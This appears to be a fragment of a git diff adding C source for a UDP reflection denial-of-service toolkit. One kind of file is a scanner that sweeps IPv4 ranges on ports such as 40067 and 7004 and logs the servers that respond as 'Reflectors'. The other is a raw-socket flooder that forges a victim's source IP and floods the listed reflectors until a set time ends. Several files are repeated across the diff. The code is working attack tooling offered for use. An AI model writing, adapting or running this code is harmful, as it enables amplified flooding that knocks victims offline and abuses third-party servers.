||||
sleeptime+=100;
|
||||
} else {
|
||||
limiter--;
|
||||
}
|
||||
} else {
|
||||
limiter++;
|
||||
if(sleeptime > 25)
|
||||
{
|
||||
sleeptime-=25;
|
||||
} else {
|
||||
sleeptime = 0;
|
||||
}
|
||||
}
|
||||
pps = 0;
|
||||
}
|
||||
return 0;
|
||||
}
|
|
@ -0,0 +1,306 @@
|
|||
#include <pcap.h>
|
||||
#include <stdio.h>
|
||||
#include <stdlib.h> // for exit()
|
||||
#include <string.h> //for memset
|
||||
#include <sys/ioctl.h>
|
||||
#include <net/if.h>
|
||||
#include <sys/socket.h>
|
||||
#include <arpa/inet.h> // for inet_ntoa()
|
||||
#include <net/ethernet.h>
|
||||
#include <netinet/udp.h> //Provides declarations for udp header
|
||||
#include <netinet/ip.h> //Provides declarations for ip header
|
||||
#include <pthread.h>
|
||||
#include <semaphore.h>
|
||||
#include <signal.h>
|
||||
#include <sys/resource.h>
|
||||
#include <unistd.h>
|
||||
static unsigned int payloadsize = 1;
|
||||
static unsigned int xport = 40067;
|
||||
void process_packet(void *args, struct pcap_pkthdr *header, void *buffer);
|
||||
|
||||
struct buffer
|
||||
{
|
||||
void *data;
|
||||
int size;
|
||||
struct buffer *next;
|
||||
struct buffer *prev;
|
||||
};
|
||||
struct buffer *head;
|
||||
|
||||
char *ipv4;
|
||||
int processed,over,total,i,j;
|
||||
struct sockaddr_in dest;
|
||||
pthread_mutex_t buf_mutex = PTHREAD_MUTEX_INITIALIZER;
|
||||
sem_t loop_sem;
|
||||
int running_threads = 0;
|
||||
volatile int found_srvs = 0;
|
||||
volatile unsigned long per_thread = 0;
|
||||
volatile unsigned long start = 0;
|
||||
volatile unsigned long scanned = 0;
|
||||
int sleep_between = 0;
|
||||
volatile int bytes_sent = 0;
|
||||
volatile unsigned long hosts_done = 0;
|
||||
FILE *fd;
|
||||
|
||||
void *readthread()
|
||||
{
|
||||
struct buffer *ourhead = head;
|
||||
struct sockaddr_in saddr;
|
||||
while(1)
|
||||
{
|
||||
sem_wait(&loop_sem);
|
||||
while(ourhead->data == NULL){ ourhead = ourhead->next; }
|
||||
pthread_mutex_lock(&buf_mutex);
|
||||
void *buf = malloc(ourhead->size);
|
||||
int size = ourhead->size;
|
||||
memcpy(buf, ourhead->data, ourhead->size);
|
||||
free(ourhead->data);
|
||||
ourhead->data = NULL;
|
||||
ourhead->size = 0;
|
||||
pthread_mutex_unlock(&buf_mutex);
|
||||
memset(&saddr, 0, sizeof(saddr));
|
||||
struct iphdr *iph = (struct iphdr*)(buf + sizeof(struct ethhdr));
|
||||
saddr.sin_addr.s_addr = iph->saddr;
|
||||
struct udphdr *udph = (struct udphdr *)(buf + sizeof(struct ethhdr) + sizeof(struct iphdr));
|
||||
if(ntohs(udph->source) == xport)
|
||||
{
|
||||
int body_length = size - sizeof(struct ethhdr) - sizeof(struct iphdr) - sizeof(struct udphdr);
|
||||
fprintf(fd,"%s %d\n",inet_ntoa(saddr.sin_addr),body_length);
|
||||
fflush(fd);
|
||||
found_srvs++;
|
||||
}
|
||||
free(buf);
|
||||
processed++;
|
||||
ourhead = ourhead->next;
|
||||
}
|
||||
}
|
||||
|
||||
void *flood(void *par1)
|
||||
{
|
||||
running_threads++;
|
||||
int thread_id = (int)par1;
|
||||
unsigned long start_ip = htonl(ntohl(start)+(per_thread*thread_id));
|
||||
unsigned long end = htonl(ntohl(start)+(per_thread*(thread_id+1)));
|
||||
unsigned long w;
|
||||
int y;
|
||||
unsigned char buf[65536];
|
||||
memcpy(buf, "\x00", payloadsize);
|
||||
int sizeofpayload = payloadsize;
|
||||
int sock;
|
||||
if((sock=socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP))<0) {
|
||||
perror("cant open socket");
|
||||
exit(-1);
|
||||
}
|
||||
for(w=ntohl(start_ip);w<htonl(end);w++)
|
||||
{
|
||||
struct sockaddr_in servaddr;
|
||||
bzero(&servaddr, sizeof(servaddr));
|
||||
servaddr.sin_family = AF_INET;
|
||||
servaddr.sin_addr.s_addr=htonl(w);
|
||||
servaddr.sin_port=htons(xport);
|
||||
sendto(sock,(char *)buf,sizeofpayload,0, (struct sockaddr *)&servaddr,sizeof(servaddr));
|
||||
bytes_sent+=sizeofpayload;
|
||||
scanned++;
|
||||
hosts_done++;
|
||||
usleep(sleep_between*1000);
|
||||
}
|
||||
close(sock);
|
||||
running_threads--;
|
||||
return;
|
||||
}
|
||||
|
||||
void sighandler(int sig)
|
||||
{
|
||||
fclose(fd);
|
||||
printf("\n");
|
||||
exit(0);
|
||||
}
|
||||
|
||||
void *printthread(void *argvs)
|
||||
{
|
||||
char **argv = (char **)argvs;
|
||||
int threads = atoi(argv[4]);
|
||||
pthread_t thread;
|
||||
sleep(1);
|
||||
char *str_start = malloc(18);
|
||||
memset(str_start, 0, 18);
|
||||
str_start = argv[1];
|
||||
char *str_end = malloc(18);
|
||||
memset(str_end, 0, 18);
|
||||
str_end = argv[2];
|
||||
start = inet_addr(str_start);
|
||||
per_thread = (ntohl(inet_addr(str_end)) - ntohl(inet_addr(str_start))) / threads;
|
||||
unsigned long toscan = (ntohl(inet_addr(str_end)) - ntohl(inet_addr(str_start)));
|
||||
int i;
|
||||
for(i = 0;i<threads;i++){
|
||||
pthread_create( &thread, NULL, &flood, (void *) i);
|
||||
}
|
||||
char *temp = (char *)malloc(17);
|
||||
memset(temp, 0, 17);
|
||||
sprintf(temp, "Reflectors");
|
||||
printf("%-16s", temp);
|
||||
memset(temp, 0, 17);
|
||||
sprintf(temp, "IP/s");
|
||||
printf("%-16s", temp);
|
||||
memset(temp, 0, 17);
|
||||
sprintf(temp, "Bytes/s");
|
||||
printf("%-16s", temp);
|
||||
memset(temp, 0, 17);
|
||||
sprintf(temp, "Threads");
|
||||
printf("%-16s", temp);
|
||||
memset(temp, 0, 17);
|
||||
sprintf(temp, "%");
|
||||
printf("%s", temp);
|
||||
printf("\n");
|
||||
|
||||
char *new;
|
||||
new = (char *)malloc(16*6);
|
||||
while (running_threads > 0)
|
||||
{
|
||||
printf("\r");
|
||||
memset(new, '\0', 16*6);
|
||||
sprintf(new, "%s|%-15lu", new, found_srvs);
|
||||
sprintf(new, "%s|%-15d", new, scanned);
|
||||
sprintf(new, "%s|%-15d", new, bytes_sent);
|
||||
sprintf(new, "%s|%-15d", new, running_threads);
|
||||
memset(temp, 0, 17);
|
||||
int percent_done=((double)(hosts_done)/(double)(toscan))*100;
|
||||
sprintf(temp, "%d%%", percent_done);
|
||||
sprintf(new, "%s|%s", new, temp);
|
||||
printf("%s", new);
|
||||
fflush(stdout);
|
||||
bytes_sent=0;
|
||||
scanned = 0;
|
||||
sleep(1);
|
||||
}
|
||||
printf("\n");
|
||||
fclose(fd);
|
||||
exit(0);
|
||||
}
|
||||
|
||||
int main(int argc, char *argv[ ])
|
||||
|
||||
{
|
||||
if(argc < 6){
|
||||
fprintf(stderr, "Invalid parameters!\n");
|
||||
fprintf(stdout, "The right fucking way: %s <1.0.0.0> <255.255.255.255> <list> <threads> <delay>\n", argv[0]);
|
||||
exit(-1);
|
||||
}
|
||||
fd = fopen(argv[3], "a");
|
||||
sleep_between = atoi(argv[5]);
|
||||
int num_threads = atoi(argv[4]);
|
||||
|
||||
const rlim_t kOpenFD = 1024 + (num_threads * 2);
|
||||
struct rlimit rl;
|
||||
int result;
|
||||
rl.rlim_cur = kOpenFD;
|
||||
rl.rlim_max = kOpenFD;
|
||||
result = setrlimit(RLIMIT_NOFILE, &rl);
|
||||
if (result != 0)
|
||||
{
|
||||
perror("setrlimit_nofile");
|
||||
fprintf(stderr, "setrlimit_nofile returned result = %d\n", result);
|
||||
}
|
||||
bzero(&rl, sizeof(struct rlimit));
|
||||
rl.rlim_cur = 256 * 1024;
|
||||
rl.rlim_max = 4096 * 1024;
|
||||
result = setrlimit(RLIMIT_STACK, &rl);
|
||||
if (result != 0)
|
||||
{
|
||||
perror("setrlimit_stack");
|
||||
fprintf(stderr, "setrlimit_stack returned result = %d\n", result);
|
||||
}
|
||||
|
||||
signal(SIGINT, &sighandler);
|
||||
|
||||
pcap_if_t *alldevsp;
|
||||
pcap_t *handle; //Handle of the device that shall be sniffed
|
||||
|
||||
char errbuf[100] , *devname , devs[100][100];
|
||||
int count = 1 , n;
|
||||
|
||||
if( pcap_findalldevs( &alldevsp , errbuf) )
|
||||
{
|
||||
exit(1);
|
||||
}
|
||||
|
||||
devname = alldevsp->name;
|
||||
ipv4 = malloc(16);
|
||||
bzero(ipv4, 16);
|
||||
struct ifreq ifc;
|
||||
int res;
|
||||
int sockfd = socket(AF_INET, SOCK_DGRAM, 0);
|
||||
|
||||
if(sockfd < 0) exit(-1);
|
||||
strcpy(ifc.ifr_name, devname);
|
||||
res = ioctl(sockfd, SIOCGIFADDR, &ifc);
|
||||
close(sockfd);
|
||||
if(res < 0) exit(-1);
|
||||
strcpy(ipv4, inet_ntoa(((struct sockaddr_in*)&ifc.ifr_addr)->sin_addr));
|
||||
printf("Opening device %s for sniffing ... " , devname);
|
||||
handle = pcap_open_live(devname , 65536 , 1 , 0 , errbuf);
|
||||
|
||||
if (handle == NULL)
|
||||
{
|
||||
fprintf(stderr, "Couldn't open device %s : %s\n" , devname , errbuf);
|
||||
exit(1);
|
||||
}
|
||||
printf("Done\n");
|
||||
|
||||
sem_init(&loop_sem, 0, -1);
|
||||
i = 1024*1000;
|
||||
while(i--)
|
||||
{
|
||||
if(head == NULL)
|
||||
{
|
||||
head = (struct buffer *)malloc(sizeof(struct buffer));
|
||||
bzero(head, sizeof(struct buffer));
|
||||
head->data = NULL;
|
||||
head->size = 0;
|
||||
head->next = head;
|
||||
head->prev = head;
|
||||
} else {
|
||||
struct buffer *new_node = (struct buffer *)malloc(sizeof(struct buffer));
|
||||
bzero(new_node, sizeof(struct buffer));
|
||||
new_node->data = NULL;
|
||||
new_node->size = 0;
|
||||
new_node->prev = head;
|
||||
new_node->next = head->next;
|
||||
head->next = new_node;
|
||||
}
|
||||
}
|
||||
|
||||
pthread_t prnthread;
|
||||
pthread_create( &prnthread, NULL, &printthread, (void *)argv);
|
||||
pthread_t redthread;
|
||||
pthread_create( &redthread, NULL, &readthread, NULL);
|
||||
|
||||
pcap_loop(handle , -1 , process_packet , NULL);
|
||||
|
||||
return 0;
|
||||
}
|
||||
|
||||
void process_packet(void *args, struct pcap_pkthdr *header, void *buffer)
|
||||
{
|
||||
int size = header->len;
|
||||
|
||||
//Get the IP Header part of this packet , excluding the ethernet header
|
||||
struct iphdr *iph = (struct iphdr*)(buffer + sizeof(struct ethhdr));
|
||||
memset(&dest, 0, sizeof(dest));
|
||||
dest.sin_addr.s_addr = iph->daddr;
|
||||
|
||||
if(iph->protocol == 17 && strcmp(inet_ntoa(dest.sin_addr), ipv4) == 0)
|
||||
{
|
||||
//toss into buffer
|
||||
if(head->data != NULL) over++;
|
||||
pthread_mutex_lock(&buf_mutex);
|
||||
void *temp = malloc(size);
|
||||
memcpy(temp, buffer, size);
|
||||
head->data = temp;
|
||||
head->size = size;
|
||||
head = head->next;
|
||||
pthread_mutex_unlock(&buf_mutex);
|
||||
sem_post(&loop_sem);
|
||||
total++;
|
||||
}
|
||||
}
|
|
@ -0,0 +1,211 @@
|
|||
/*
|
||||
* This is released under the GNU GPL License v3.0, and is allowed to be used for commercial products ;)
|
||||
*/
|
||||
#include <time.h>
|
||||
#include <pthread.h>
|
||||
#include <unistd.h>
|
||||
#include <stdio.h>
|
||||
#include <stdlib.h>
|
||||
#include <string.h>
|
||||
#include <sys/socket.h>
|
||||
#include <netinet/ip.h>
|
||||
#include <netinet/udp.h>
|
||||
#include <arpa/inet.h>
|
||||
#define MAX_PACKET_SIZE 8192
|
||||
#define PHI 0x9e3779b9
|
||||
static uint32_t Q[4096], c = 362436;
|
||||
struct list
|
||||
{
|
||||
struct sockaddr_in data;
|
||||
struct list *next;
|
||||
struct list *prev;
|
||||
};
|
||||
struct list *head;
|
||||
volatile int tehport;
|
||||
volatile int limiter;
|
||||
volatile unsigned int pps;
|
||||
volatile unsigned int sleeptime = 100;
|
||||
struct thread_data{ int thread_id; struct list *list_node; struct sockaddr_in sin; };
|
||||
void init_rand(uint32_t x)
|
||||
{
|
||||
int i;
|
||||
Q[0] = x;
|
||||
Q[1] = x + PHI;
|
||||
Q[2] = x + PHI + PHI;
|
||||
for (i = 3; i < 4096; i++)
|
||||
{
|
||||
Q[i] = Q[i - 3] ^ Q[i - 2] ^ PHI ^ i;
|
||||
}
|
||||
}
|
||||
uint32_t rand_cmwc(void)
|
||||
{
|
||||
uint64_t t, a = 18782LL;
|
||||
static uint32_t i = 4095;
|
||||
uint32_t x, r = 0xfffffffe;
|
||||
i = (i + 1) & 4095;
|
||||
t = a * Q[i] + c;
|
||||
c = (t >> 32);
|
||||
x = t + c;
|
||||
if (x < c) {
|
||||
x++;
|
||||
c++;
|
||||
}
|
||||
return (Q[i] = r - x);
|
||||
}
|
||||
unsigned short csum (unsigned short *buf, int nwords)
|
||||
{
|
||||
unsigned long sum = 0;
|
||||
for (sum = 0; nwords > 0; nwords--)
|
||||
sum += *buf++;
|
||||
sum = (sum >> 16) + (sum & 0xffff);
|
||||
sum += (sum >> 16);
|
||||
return (unsigned short)(~sum);
|
||||
}
|
||||
void setup_ip_header(struct iphdr *iph)
|
||||
{
|
||||
iph->ihl = 5;
|
||||
iph->version = 4;
|
||||
iph->tos = 0;
|
||||
iph->tot_len = sizeof(struct iphdr) + sizeof(struct udphdr) + 1;
|
||||
iph->id = htonl(54321);
|
||||
iph->frag_off = 0;
|
||||
iph->ttl = MAXTTL;
|
||||
iph->protocol = IPPROTO_UDP;
|
||||
iph->check = 0;
|
||||
iph->saddr = inet_addr("192.168.3.100");
|
||||
}
|
||||
void setup_udp_header(struct udphdr *udph)
|
||||
{
|
||||
udph->source = htons(5678);
|
||||
udph->dest = htons(7004);
|
||||
udph->check = 0;
|
||||
memcpy((void *)udph + sizeof(struct udphdr), "0x01", 1);
|
||||
udph->len=htons(sizeof(struct udphdr) + 1);
|
||||
}
|
||||
void *flood(void *par1)
|
||||
{
|
||||
struct thread_data *td = (struct thread_data *)par1;
|
||||
char datagram[MAX_PACKET_SIZE];
|
||||
struct iphdr *iph = (struct iphdr *)datagram;
|
||||
struct udphdr *udph = (/*u_int8_t*/void *)iph + sizeof(struct iphdr);
|
||||
struct sockaddr_in sin = td->sin;
|
||||
struct list *list_node = td->list_node;
|
||||
int s = socket(PF_INET, SOCK_RAW, IPPROTO_TCP);
|
||||
if(s < 0){
|
||||
fprintf(stderr, "Could not open raw socket.\n");
|
||||
exit(-1);
|
||||
}
|
||||
init_rand(time(NULL));
|
||||
memset(datagram, 0, MAX_PACKET_SIZE);
|
||||
setup_ip_header(iph);
|
||||
setup_udp_header(udph);
|
||||
udph->source = htons(rand() % 65535 - 1026);
|
||||
iph->saddr = sin.sin_addr.s_addr;
|
||||
iph->daddr = list_node->data.sin_addr.s_addr;
|
||||
iph->check = csum ((unsigned short *) datagram, iph->tot_len >> 1);
|
||||
int tmp = 1;
|
||||
const int *val = &tmp;
|
||||
if(setsockopt(s, IPPROTO_IP, IP_HDRINCL, val, sizeof (tmp)) < 0){
|
||||
fprintf(stderr, "Error: setsockopt() - Cannot set HDRINCL!\n");
|
||||
exit(-1);
|
||||
}
|
||||
init_rand(time(NULL));
|
||||
register unsigned int i;
|
||||
i = 0;
|
||||
while(1){
|
||||
sendto(s, datagram, iph->tot_len, 0, (struct sockaddr *) &list_node->data, sizeof(list_node->data));
|
||||
list_node = list_node->next;
|
||||
iph->daddr = list_node->data.sin_addr.s_addr;
|
||||
iph->id = htonl(rand_cmwc() & 0xFFFFFFFF);
|
||||
iph->check = csum ((unsigned short *) datagram, iph->tot_len >> 1);
|
||||
|
||||
pps++;
|
||||
if(i >= limiter)
|
||||
{
|
||||
i = 0;
|
||||
usleep(sleeptime);
|
||||
}
|
||||
i++;
|
||||
}
|
||||
}
|
||||
int main(int argc, char *argv[ ])
|
||||
{
|
||||
if(argc < 6){
|
||||
fprintf(stderr, "Invalid parameters!\n");
|
||||
fprintf(stdout, "Usage: %s <target IP> <target port> <reflection file> <threads> <pps limiter, -1 for no limit> <time>\n", argv[0]);
|
||||
exit(-1);
|
||||
}
|
||||
srand(time(NULL));
|
||||
int i = 0;
|
||||
head = NULL;
|
||||
fprintf(stdout, "Setting up sockets...\n");
|
||||
int max_len = 128;
|
||||
char *buffer = (char *) malloc(max_len);
|
||||
buffer = memset(buffer, 0x00, max_len);
|
||||
int num_threads = atoi(argv[4]);
|
||||
int maxpps = atoi(argv[5]);
|
||||
limiter = 0;
|
||||
pps = 0;
|
||||
int multiplier = 20;
|
||||
FILE *list_fd = fopen(argv[3], "r");
|
||||
while (fgets(buffer, max_len, list_fd) != NULL) {
|
||||
if ((buffer[strlen(buffer) - 1] == '\n') ||
|
||||
(buffer[strlen(buffer) - 1] == '\r')) {
|
||||
buffer[strlen(buffer) - 1] = 0x00;
|
||||
if(head == NULL)
|
||||
{
|
||||
head = (struct list *)malloc(sizeof(struct list));
|
||||
bzero(&head->data, sizeof(head->data));
|
||||
head->data.sin_addr.s_addr=inet_addr(buffer);
|
||||
head->next = head;
|
||||
head->prev = head;
|
||||
} else {
|
||||
struct list *new_node = (struct list *)malloc(sizeof(struct list));
|
||||
memset(new_node, 0x00, sizeof(struct list));
|
||||
new_node->data.sin_addr.s_addr=inet_addr(buffer);
|
||||
new_node->prev = head;
|
||||
new_node->next = head->next;
|
||||
head->next = new_node;
|
||||
}
|
||||
i++;
|
||||
} else {
|
||||
continue;
|
||||
}
|
||||
}
|
||||
struct list *current = head->next;
|
||||
pthread_t thread[num_threads];
|
||||
struct sockaddr_in sin;
|
||||
sin.sin_family = AF_INET;
|
||||
sin.sin_addr.s_addr = inet_addr(argv[1]);
|
||||
struct thread_data td[num_threads];
|
||||
for(i = 0;i<num_threads;i++){
|
||||
td[i].thread_id = i;
|
||||
td[i].sin= sin;
|
||||
td[i].list_node = current;
|
||||
pthread_create( &thread[i], NULL, &flood, (void *) &td[i]);
|
||||
}
|
||||
fprintf(stdout, "Starting flood...\n");
|
||||
for(i = 0;i<(atoi(argv[6])*multiplier);i++)
|
||||
{
|
||||
usleep((1000/multiplier)*1000);
|
||||
if((pps*multiplier) > maxpps)
|
||||
{
|
||||
if(1 > limiter)
|
||||
{
|
||||
sleeptime+=100;
|
||||
} else {
|
||||
limiter--;
|
||||
}
|
||||
} else {
|
||||
limiter++;
|
||||
if(sleeptime > 25)
|
||||
{
|
||||
sleeptime-=25;
|
||||
} else {
|
||||
sleeptime = 0;
|
||||
}
|
||||
}
|
||||
pps = 0;
|
||||
}
|
||||
return 0;
|
||||
}
|
|
@ -0,0 +1,306 @@
|
|||
#include <pcap.h>
|
||||
#include <stdio.h>
|
||||
#include <stdlib.h> // for exit()
|
||||
#include <string.h> //for memset
|
||||
#include <sys/ioctl.h>
|
||||
#include <net/if.h>
|
||||
#include <sys/socket.h>
|
||||
#include <arpa/inet.h> // for inet_ntoa()
|
||||
#include <net/ethernet.h>
|
||||
#include <netinet/udp.h> //Provides declarations for udp header
|
||||
#include <netinet/ip.h> //Provides declarations for ip header
|
||||
#include <pthread.h>
|
||||
#include <semaphore.h>
|
||||
#include <signal.h>
|
||||
#include <sys/resource.h>
|
||||
#include <unistd.h>
|
||||
static unsigned int payloadsize = 1;
|
||||
static unsigned int xport = 7004;
|
||||
void process_packet(void *args, struct pcap_pkthdr *header, void *buffer);
|
||||
|
||||
struct buffer
|
||||
{
|
||||
void *data;
|
||||
int size;
|
||||
struct buffer *next;
|
||||
struct buffer *prev;
|
||||
};
|
||||
struct buffer *head;
|
||||
|
||||
char *ipv4;
|
||||
int processed,over,total,i,j;
|
||||
struct sockaddr_in dest;
|
||||
pthread_mutex_t buf_mutex = PTHREAD_MUTEX_INITIALIZER;
|
||||
sem_t loop_sem;
|
||||
int running_threads = 0;
|
||||
volatile int found_srvs = 0;
|
||||
volatile unsigned long per_thread = 0;
|
||||
volatile unsigned long start = 0;
|
||||
volatile unsigned long scanned = 0;
|
||||
int sleep_between = 0;
|
||||
volatile int bytes_sent = 0;
|
||||
volatile unsigned long hosts_done = 0;
|
||||
FILE *fd;
|
||||
|
||||
void *readthread()
|
||||
{
|
||||
struct buffer *ourhead = head;
|
||||
struct sockaddr_in saddr;
|
||||
while(1)
|
||||
{
|
||||
sem_wait(&loop_sem);
|
||||
while(ourhead->data == NULL){ ourhead = ourhead->next; }
|
||||
pthread_mutex_lock(&buf_mutex);
|
||||
void *buf = malloc(ourhead->size);
|
||||
int size = ourhead->size;
|
||||
memcpy(buf, ourhead->data, ourhead->size);
|
||||
free(ourhead->data);
|
||||
ourhead->data = NULL;
|
||||
ourhead->size = 0;
|
||||
pthread_mutex_unlock(&buf_mutex);
|
||||
memset(&saddr, 0, sizeof(saddr));
|
||||
struct iphdr *iph = (struct iphdr*)(buf + sizeof(struct ethhdr));
|
||||
saddr.sin_addr.s_addr = iph->saddr;
|
||||
struct udphdr *udph = (struct udphdr *)(buf + sizeof(struct ethhdr) + sizeof(struct iphdr));
|
||||
if(ntohs(udph->source) == xport)
|
||||
{
|
||||
int body_length = size - sizeof(struct ethhdr) - sizeof(struct iphdr) - sizeof(struct udphdr);
|
||||
fprintf(fd,"%s %d\n",inet_ntoa(saddr.sin_addr),body_length);
|
||||
fflush(fd);
|
||||
found_srvs++;
|
||||
}
|
||||
free(buf);
|
||||
processed++;
|
||||
ourhead = ourhead->next;
|
||||
}
|
||||
}
|
||||
|
||||
void *flood(void *par1)
|
||||
{
|
||||
running_threads++;
|
||||
int thread_id = (int)par1;
|
||||
unsigned long start_ip = htonl(ntohl(start)+(per_thread*thread_id));
|
||||
unsigned long end = htonl(ntohl(start)+(per_thread*(thread_id+1)));
|
||||
unsigned long w;
|
||||
int y;
|
||||
unsigned char buf[65536];
|
||||
memcpy(buf, "\x00", payloadsize);
|
||||
int sizeofpayload = payloadsize;
|
||||
int sock;
|
||||
if((sock=socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP))<0) {
|
||||
perror("cant open socket");
|
||||
exit(-1);
|
||||
}
|
||||
for(w=ntohl(start_ip);w<htonl(end);w++)
|
||||
{
|
||||
struct sockaddr_in servaddr;
|
||||
bzero(&servaddr, sizeof(servaddr));
|
||||
servaddr.sin_family = AF_INET;
|
||||
servaddr.sin_addr.s_addr=htonl(w);
|
||||
servaddr.sin_port=htons(xport);
|
||||
sendto(sock,(char *)buf,sizeofpayload,0, (struct sockaddr *)&servaddr,sizeof(servaddr));
|
||||
bytes_sent+=sizeofpayload;
|
||||
scanned++;
|
||||
hosts_done++;
|
||||
usleep(sleep_between*1000);
|
||||
}
|
||||
close(sock);
|
||||
running_threads--;
|
||||
return;
|
||||
}
|
||||
|
||||
void sighandler(int sig)
|
||||
{
|
||||
fclose(fd);
|
||||
printf("\n");
|
||||
exit(0);
|
||||
}
|
||||
|
||||
void *printthread(void *argvs)
|
||||
{
|
||||
char **argv = (char **)argvs;
|
||||
int threads = atoi(argv[4]);
|
||||
pthread_t thread;
|
||||
sleep(1);
|
||||
char *str_start = malloc(18);
|
||||
memset(str_start, 0, 18);
|
||||
str_start = argv[1];
|
||||
char *str_end = malloc(18);
|
||||
memset(str_end, 0, 18);
|
||||
str_end = argv[2];
|
||||
start = inet_addr(str_start);
|
||||
per_thread = (ntohl(inet_addr(str_end)) - ntohl(inet_addr(str_start))) / threads;
|
||||
unsigned long toscan = (ntohl(inet_addr(str_end)) - ntohl(inet_addr(str_start)));
|
||||
int i;
|
||||
for(i = 0;i<threads;i++){
|
||||
pthread_create( &thread, NULL, &flood, (void *) i);
|
||||
}
|
||||
char *temp = (char *)malloc(17);
|
||||
memset(temp, 0, 17);
|
||||
sprintf(temp, "Reflectors");
|
||||
printf("%-16s", temp);
|
||||
memset(temp, 0, 17);
|
||||
sprintf(temp, "IP/s");
|
||||
printf("%-16s", temp);
|
||||
memset(temp, 0, 17);
|
||||
sprintf(temp, "Bytes/s");
|
||||
printf("%-16s", temp);
|
||||
memset(temp, 0, 17);
|
||||
sprintf(temp, "Threads");
|
||||
printf("%-16s", temp);
|
||||
memset(temp, 0, 17);
|
||||
sprintf(temp, "%");
|
||||
printf("%s", temp);
|
||||
printf("\n");
|
||||
|
||||
char *new;
|
||||
new = (char *)malloc(16*6);
|
||||
while (running_threads > 0)
|
||||
{
|
||||
printf("\r");
|
||||
memset(new, '\0', 16*6);
|
||||
sprintf(new, "%s|%-15lu", new, found_srvs);
|
||||
sprintf(new, "%s|%-15d", new, scanned);
|
||||
sprintf(new, "%s|%-15d", new, bytes_sent);
|
||||
sprintf(new, "%s|%-15d", new, running_threads);
|
||||
memset(temp, 0, 17);
|
||||
int percent_done=((double)(hosts_done)/(double)(toscan))*100;
|
||||
sprintf(temp, "%d%%", percent_done);
|
||||
sprintf(new, "%s|%s", new, temp);
|
||||
printf("%s", new);
|
||||
fflush(stdout);
|
||||
bytes_sent=0;
|
||||
scanned = 0;
|
||||
sleep(1);
|
||||
}
|
||||
printf("\n");
|
||||
fclose(fd);
|
||||
exit(0);
|
||||
}
|
||||
|
||||
int main(int argc, char *argv[ ])
|
||||
|
||||
{
|
||||
if(argc < 6){
|
||||
fprintf(stderr, "Invalid parameters!\n");
|
||||
fprintf(stdout, "The right fucking way: %s <1.0.0.0> <255.255.255.255> <list> <threads> <delay>\n", argv[0]);
|
||||
exit(-1);
|
||||
}
|
||||
fd = fopen(argv[3], "a");
|
||||
sleep_between = atoi(argv[5]);
|
||||
int num_threads = atoi(argv[4]);
|
||||
|
||||
const rlim_t kOpenFD = 1024 + (num_threads * 2);
|
||||
struct rlimit rl;
|
||||
int result;
|
||||
rl.rlim_cur = kOpenFD;
|
||||
rl.rlim_max = kOpenFD;
|
||||
result = setrlimit(RLIMIT_NOFILE, &rl);
|
||||
if (result != 0)
|
||||
{
|
||||
perror("setrlimit_nofile");
|
||||
fprintf(stderr, "setrlimit_nofile returned result = %d\n", result);
|
||||
}
|
||||
bzero(&rl, sizeof(struct rlimit));
|
||||
rl.rlim_cur = 256 * 1024;
|
||||
rl.rlim_max = 4096 * 1024;
|
||||
result = setrlimit(RLIMIT_STACK, &rl);
|
||||
if (result != 0)
|
||||
{
|
||||
perror("setrlimit_stack");
|
||||
fprintf(stderr, "setrlimit_stack returned result = %d\n", result);
|
||||
}
|
||||
|
||||
signal(SIGINT, &sighandler);
|
||||
|
||||
pcap_if_t *alldevsp;
|
||||
pcap_t *handle; //Handle of the device that shall be sniffed
|
||||
|
||||
char errbuf[100] , *devname , devs[100][100];
|
||||
int count = 1 , n;
|
||||
|
||||
if( pcap_findalldevs( &alldevsp , errbuf) )
|
||||
{
|
||||
exit(1);
|
||||
}
|
||||
|
||||
devname = alldevsp->name;
|
||||
ipv4 = malloc(16);
|
||||
bzero(ipv4, 16);
|
||||
struct ifreq ifc;
|
||||
int res;
|
||||
int sockfd = socket(AF_INET, SOCK_DGRAM, 0);
|
||||
|
||||
if(sockfd < 0) exit(-1);
|
||||
strcpy(ifc.ifr_name, devname);
|
||||
res = ioctl(sockfd, SIOCGIFADDR, &ifc);
|
||||
close(sockfd);
|
||||
if(res < 0) exit(-1);
|
||||
strcpy(ipv4, inet_ntoa(((struct sockaddr_in*)&ifc.ifr_addr)->sin_addr));
|
||||
printf("Opening device %s for sniffing ... " , devname);
|
||||
handle = pcap_open_live(devname , 65536 , 1 , 0 , errbuf);
|
||||
|
||||
if (handle == NULL)
|
||||
{
|
||||
fprintf(stderr, "Couldn't open device %s : %s\n" , devname , errbuf);
|
||||
exit(1);
|
||||
}
|
||||
printf("Done\n");
|
||||
|
||||
sem_init(&loop_sem, 0, -1);
|
||||
i = 1024*1000;
|
||||
while(i--)
|
||||
{
|
||||
if(head == NULL)
|
||||
{
|
||||
head = (struct buffer *)malloc(sizeof(struct buffer));
|
||||
bzero(head, sizeof(struct buffer));
|
||||
head->data = NULL;
|
||||
head->size = 0;
|
||||
head->next = head;
|
||||
head->prev = head;
|
||||
} else {
|
||||
struct buffer *new_node = (struct buffer *)malloc(sizeof(struct buffer));
|
||||
bzero(new_node, sizeof(struct buffer));
|
||||
new_node->data = NULL;
|
||||
new_node->size = 0;
|
||||
new_node->prev = head;
|
||||
new_node->next = head->next;
|
||||
head->next = new_node;
|
||||
}
|
||||
}
|
||||
|
||||
pthread_t prnthread;
|
||||
pthread_create( &prnthread, NULL, &printthread, (void *)argv);
|
||||
pthread_t redthread;
|
||||
pthread_create( &redthread, NULL, &readthread, NULL);
|
||||
|
||||
pcap_loop(handle , -1 , process_packet , NULL);
|
||||
|
||||
return 0;
|
||||
}
|
||||
|
||||
void process_packet(void *args, struct pcap_pkthdr *header, void *buffer)
|
||||
{
|
||||
int size = header->len;
|
||||
|
||||
//Get the IP Header part of this packet , excluding the ethernet header
|
||||
struct iphdr *iph = (struct iphdr*)(buffer + sizeof(struct ethhdr));
|
||||
memset(&dest, 0, sizeof(dest));
|
||||
dest.sin_addr.s_addr = iph->daddr;
|
||||
|
||||
if(iph->protocol == 17 && strcmp(inet_ntoa(dest.sin_addr), ipv4) == 0)
|
||||
{
|
||||
//toss into buffer
|
||||
if(head->data != NULL) over++;
|
||||
pthread_mutex_lock(&buf_mutex);
|
||||
void *temp = malloc(size);
|
||||
memcpy(temp, buffer, size);
|
||||
head->data = temp;
|
||||
head->size = size;
|
||||
head = head->next;
|
||||
pthread_mutex_unlock(&buf_mutex);
|
||||
sem_post(&loop_sem);
|
||||
total++;
|
||||
}
|
||||
}
|
|
@ -0,0 +1,211 @@
|
|||
/*
|
||||
* This is released under the GNU GPL License v3.0, and is allowed to be used for commercial products ;)
|
||||
*/
|
||||
